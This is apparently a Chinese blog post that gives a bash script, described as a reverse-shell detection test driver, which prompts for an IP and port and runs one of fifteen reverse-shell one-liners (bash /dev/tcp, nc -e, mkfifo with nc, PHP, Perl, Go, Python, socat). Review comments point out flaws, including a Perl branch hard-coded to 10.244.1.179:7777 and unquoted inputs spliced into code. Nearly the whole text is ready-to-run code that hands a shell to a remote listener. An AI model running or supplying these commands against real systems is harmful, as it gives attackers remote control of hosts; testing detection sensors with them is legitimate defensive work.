反弹Shell测试脚本

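使用下列脚本可以测试反弹Shell:脚本从命令行参数或交互输入中读取目标IP和端口,打印15种反弹方式的菜单,然后执行所选编号对应的命令。注意:选项8的Perl命令中地址和端口是写死的(10.244.1.179:7777),不会使用输入的IP和端口。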

#!/bin/bash
# Reverse-shell detection test driver.
#
# Usage: script.sh [IP PORT]
#   With exactly two arguments they become IP and PORT; otherwise both are
#   read interactively. The script prints a menu of 15 variants, reads a
#   number, and runs the matching command.
#
# Every branch makes an outbound TCP connection to IP:PORT and attaches a
# shell's stdin/stdout/stderr to it. The mechanisms differ (bash /dev/tcp
# redirection, a named pipe combined with nc or telnet, or an interpreter
# that hands the socket to a shell), so each variant can be checked against
# a host sensor separately.
#
# NOTE(review): IP and PORT are never validated and are expanded unquoted
# below. In branches 4, 11 and 12 they are spliced into PHP, Go and Python
# source text, so a value containing quotes or spaces changes the code that
# runs. Restricting IP to a dotted-quad and PORT to digits before the menu
# would close that.
 
if [ $# == 2 ];then
    IP=$1
    PORT=$2
else
read -p "请输入目标IP:" IP
read -p "请输入目标Port:" PORT

fi
echo "目标IP:目标Port -> $IP:$PORT"

# Menu text only; "ip" and "port" are literal placeholders here.
# NOTE(review): entries 4 and 8 are double-quoted, so the shell expands
# $sock, $i and $p (unset, hence empty), and the unescaped "ip" in entry 4
# closes and reopens the string. The printed text for those entries
# therefore differs from the command that runs. Entry 8 also shows
# sockaddr_in($i,inet_aton(ip)) while the branch below uses
# sockaddr_in($p,inet_aton($i)), and entry 15 shows a literal 777 where the
# branch uses $PORT.
echo "1) bash -i >& /dev/tcp/ip/port 0>&1"
echo "2) busybox sh -i >& /dev/tcp/ip/port 0<&1"
echo "3) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f"
echo "4) php -r '$sock=fsockopen("ip",port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
echo "5) nc -e /bin/bash ip port"
echo "6) nc -c bash ip port"
echo "7) sh -i 5<> /dev/tcp/ip/port 0<&5 1>&5 2>&5"
echo "8) perl -e 'use Socket;$i=\"ip\";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($i,inet_aton(ip)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
echo "9) mknod backpipe p; nc ip port 0<backpipe | /bin/bash 1>backpipe 2>backpipe"
echo "10) mknod a p; telnet ip port 0<a | /bin/bash 1>a"
echo "11) echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"ip:port\");cmd:=exec.Command(\"/bin/bash\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go"
echo "12) python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"ip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'"
echo "13) socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port"
echo "14) exec /bin/sh 0</dev/tcp/ip/port 1>&0 2>&0"
echo "15) 0<&196;exec 196<>/dev/tcp/ip/777; sh <&196 >&196 2>&196"
# The prompt offers "q" to quit, but no branch handles it: any value other
# than 1-15 simply matches nothing and the script ends.
read -p "请输入攻击类型(q 退出):" choice

# Dispatch is a chain of nested "else if" blocks (not elif), which is why
# fifteen closing "fi" lines follow. Comparisons are string comparisons.
if [ "$choice" == 1 ];then
    # exec replaces this script's process with the interactive bash, so
    # nothing after this line runs when the branch is taken.
    exec bash -i >& /dev/tcp/$IP/$PORT 0>&1
    else if [ "$choice" == 2 ];then
        # The /dev/tcp redirection is opened by the bash running this script;
        # busybox only inherits the resulting descriptors.
        busybox sh -i >& /dev/tcp/$IP/$PORT 0<&1
    else if [ "$choice" == 3 ];then
        # NOTE(review): /tmp/f is a fixed name in a shared directory and is
        # left behind afterwards; the leading rm has no -f, so it prints an
        # error when the file does not exist yet.
        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f
    else if [ "$choice" == 4 ];then
       # $IP and $PORT are spliced into the PHP source (see the header note).
       php -r '$sock=fsockopen("'$IP'",'$PORT');exec("/bin/sh -i <&3 >&3 2>&3");'
    else if [ "$choice" == 5 ];then
        nc -e /bin/bash $IP $PORT
    else if [ "$choice" == 6 ];then
        nc -c bash $IP $PORT
    else if [ "$choice" == 7 ];then
        sh -i 5<> /dev/tcp/$IP/$PORT 0<&5 1>&5 2>&5
    else if [ "$choice" == 8 ];then
        # NOTE(review): the address and port are hard-coded in the Perl source
        # (10.244.1.179:7777); $IP and $PORT are ignored. Selecting 8 connects
        # to that fixed endpoint whatever the operator entered, so a test run
        # may reach a host that is not the intended listener.
        perl -e 'use Socket;$i="10.244.1.179";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'       
    else if [ "$choice" == 9 ];then
        # Creates the FIFO "backpipe" in the current directory and never
        # removes it; a second run finds it already present.
        mknod backpipe p; nc $IP $PORT 0<backpipe | /bin/bash 1>backpipe 2>backpipe
    else if [ "$choice" == 10 ];then
        # NOTE(review): "mknod mknod a p" has a duplicated word and does not
        # match menu entry 10 ("mknod a p"). mknod probably rejects the extra
        # operand, in which case a detection result for this variant would not
        # reflect the technique shown in the menu (TODO confirm).
        mknod mknod a p; telnet $IP $PORT 0<a | /bin/bash 1>a     
    else if [ "$choice" == 11 ];then
       # Writes Go source to the fixed path /tmp/t.go. The trailing rm runs
       # only if "go run" exits successfully, so the file can be left behind.
       echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","'$IP':'$PORT'");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
    else if [ "$choice" == 12 ];then
       # Requires a python2 binary on PATH; the socket is dup'ed onto fds 0-2
       # before pty.spawn starts bash.
       python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("'$IP'",'$PORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
    else if [ "$choice" == 13 ];then
       socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:$PORT
    else if [ "$choice" == 14 ];then
       # exec replaces this script's process with /bin/sh.
       exec /bin/sh 0</dev/tcp/$IP/$PORT 1>&0 2>&0
    else if [ "$choice" == 15 ];then
       # NOTE(review): the leading "0<&196;" runs before fd 196 is opened by
       # the following exec, so it presumably reports a bad file descriptor
       # and has no lasting effect (TODO confirm). The exec then opens fd 196
       # in this script's own shell, and sh is started with that descriptor
       # as stdin, stdout and stderr.
       0<&196;exec 196<>/dev/tcp/$IP/$PORT; sh <&196 >&196 2>&196
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi      
fi
fi        
fi
fi
fi


版权声明:本文为SHELLCODE_8BIT原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。